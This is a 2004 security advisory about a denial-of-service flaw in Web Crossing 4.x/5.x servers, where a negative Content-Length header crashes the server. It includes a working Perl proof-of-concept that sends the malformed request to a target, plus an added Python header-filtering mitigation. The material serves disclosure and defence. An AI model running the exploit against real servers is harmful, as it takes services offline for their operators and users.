
webxdos.txt

Posted Feb 3, 2004
Authored by Peter Winter-Smith | Site elitehaven.net

Web Crossing versions 4.x and 5.x have a denial of service vulnerability. When an HTTP POST request is made to the built-in server, if the 'Content-Length' header supplied with the request is an extremely large or negative number, the server will encounter a set of instructions which lead to an integer-divide-by-zero problem, immediately crashing the server and denying any further service.

tags | exploit, web, denial of service
SHA-256 | a4cb26465dde1aa7db4e37e9bae87f085ad4ccdeb6c14a77fa125516a33bbbd6

Web Crossing 4.x/5.x Denial of Service Vulnerability

###################################################

Credit:
Author : Peter Winter-Smith

Software:
Package : Web Crossing
Versions : 4.x/5.x
Vendor : WebCrossing, Inc.
Vendor Url : http://www.webcrossing.com/

Vulnerability:
Bug Type : Denial of Service
Severity : Less Critical


1. Description of Software

"Web Crossing is the world's leading collaboration server platform,
offering complete solutions including discussion groups/bulletin boards,
integrated newsgroups and mailing lists, full email services, calendar
services, real-time chats, live events and full web application
programming features, complete cross-platform compatibility, and
distributed/mirrored serving for ultimate scalability."
- Vendor's Description


2. Bug Information

(a). Denial of Service

When an HTTP POST request is made to Web Crossing's built-in server
application (default port 80/tcp), if the 'Content-Length' header supplied
with the request is an extremely large or negative number, the server
will encounter a set of instructions which lead to an integer-divide-by-
zero problem, immediately crashing the server and denying any further
service.

The offending instruction is located at 0090121F:


0090121F F7F9 IDIV ECX



3. Proof of Concept

The following Perl script should crash any Web Crossing BBS using the
built-in server application for hosting:


#########################################################################
#!/usr/bin/perl -w
#
# Web Crossing 4.x\5.x Denial of Service Exploit
# [ Bad 'Content-Length' Header Bug ]
#
# - by Peter Winter-Smith [peter4020@hotmail.com]

use IO::Socket;

if(!($ARGV[0]))
{
    print "Usage: wxdos.pl <victim>\n";
    exit;
}

print "Web Crossing 4.x\\5.x Denial of Service Exploit\n" .
      "\t[ Bad 'Content-Length' Header Bug ]\n" .
      "\t[peter4020\@hotmail.com]\n\n";

$victim = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>$ARGV[0],
                                PeerPort=>"80")
    or die "Unable to connect to $ARGV[0] on " .
           "port 80";


$DoS = "POST / HTTP/1.1\r\n" .
       "Content-Length: -1\r\n\r\n";

print $victim $DoS;

print "[+] Evil request made to target server ... Waiting...!\n";

sleep(4);

close($victim);

print "[+] Done!\n";
exit;
#########################################################################


4. Patches - Workarounds

Although I was able to contact the Web Crossing support staff, when the
investigation into this flaw was handed over to the development team all
contact was lost with both them and the support staff and my emails were
no longer answered. I have decided to release this information so that
users of Web Crossing can decide what would be a suitable course of action
for protecting their systems from this bug.

No vendor-supplied patches exist; I would recommend that filtering of the
'Content-Length' header is put into action via some third party
application if at all possible.
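
The 'Content-Length' filtering recommended above, written as a check that a front-end filter or reverse proxy could apply before forwarding a request to the built-in server. This is an added example, not part of the original advisory; the function name, the 10 MiB cap and the sample requests are assumptions.

```python
import re

MAX_BODY = 10 * 1024 * 1024          # assumed policy cap (10 MiB), tune per site
_DECIMAL = re.compile(rb"[0-9]+")     # ASCII digits only: no sign, space or hex

def check_content_length(head: bytes, max_body: int = MAX_BODY):
    """Return (status, reason) for a raw request head; 200 means forward it."""
    lines = head.split(b"\r\n\r\n", 1)[0].split(b"\r\n")
    method = lines[0].split(b" ", 1)[0].upper()
    lengths, chunked = [], False
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        # Reject folded lines and "Content-Length : 5" style names, which
        # could otherwise slip past the filter and still reach the backend.
        if not sep or not name or name != name.strip():
            return 400, "malformed header line"
        if name.lower() == b"content-length":
            lengths.append(value.strip(b" \t"))
        elif name.lower() == b"transfer-encoding" and b"chunked" in value.lower():
            chunked = True
    if not lengths:
        if method in (b"POST", b"PUT") and not chunked:
            return 411, "length required"
        return 200, "no body length declared"
    if chunked or len(set(lengths)) > 1:
        return 400, "ambiguous body length"
    if not _DECIMAL.fullmatch(lengths[0]):
        return 400, "Content-Length is not a non-negative decimal"
    # Length check first so an absurdly long digit string is never parsed.
    if len(lengths[0]) > 19 or int(lengths[0]) > max_body:
        return 413, "Content-Length exceeds limit"
    return 200, "ok"

# Constructed sample request heads (the first is the shape given in the advisory).
SAMPLES = [
    b"POST / HTTP/1.1\r\nContent-Length: -1\r\n\r\n",
    b"POST / HTTP/1.1\r\nContent-Length: 99999999999999999999999\r\n\r\n",
    b"POST / HTTP/1.1\r\nHost: forum.example\r\nContent-Length: 12\r\n\r\n",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(check_content_length(sample), sample.split(b"\r\n")[1])
```

Requests that return anything other than 200 should be answered by the filter itself and logged, so that the malformed header never reaches the Web Crossing process.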


5. Credits

The discovery, analysis and exploitation of this flaw is a result of
research carried out by Peter Winter-Smith. I would ask that you do not
regard any of the analysis to be 'set in stone', and that if investigating
this flaw you back trace the steps detailed earlier for yourself.

Greets and thanks to:
David and Mark Litchfield, JJ Gray (Nexus), Todd and all the
packetstorm crew, Luigi Auriemma, Bahaa Naamneh, sean(gilbert(perlboy)),
pv8man, nick k., Joel J. and Martine.

o This document should be mirrored at
http://www.elitehaven.net/webxdos.txt
